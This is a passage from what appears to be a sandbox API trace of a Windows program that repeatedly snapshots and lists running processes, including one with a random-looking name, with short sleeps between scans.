th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0221.185] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0221.185] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0221.185] Sleep (dwMilliseconds=0x64) [0221.304] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x228 [0221.305] Process32FirstW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.306] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.306] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.306] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.306] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.307] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.307] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.307] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.308] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.308] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0221.308] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.308] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.309] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.309] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.309] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.310] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.310] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.310] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.310] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.311] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.311] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.311] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.312] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.312] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0221.312] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0221.312] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0221.313] Process32NextW (in: hSnapshot=0x228, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0221.313] Sleep (dwMilliseconds=0x64) [0221.441] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22c [0221.443] Process32FirstW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.443] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.443] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.443] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.444] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.444] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.444] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.445] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.445] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.445] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0221.445] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.446] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.446] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.446] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.447] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.447] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.447] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.447] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.448] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.448] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.448] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.449] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.449] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.449] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0221.449] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0221.450] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0221.450] Process32NextW (in: hSnapshot=0x22c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0221.450] Sleep (dwMilliseconds=0x64) [0221.552] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x230 [0221.554] Process32FirstW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.555] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.555] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.555] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.555] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.556] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.556] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.556] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.557] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.557] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0221.557] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.557] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.558] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.558] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.558] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.559] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.559] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.559] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.559] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.560] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.560] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.560] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.561] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.561] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0221.561] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0221.561] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, 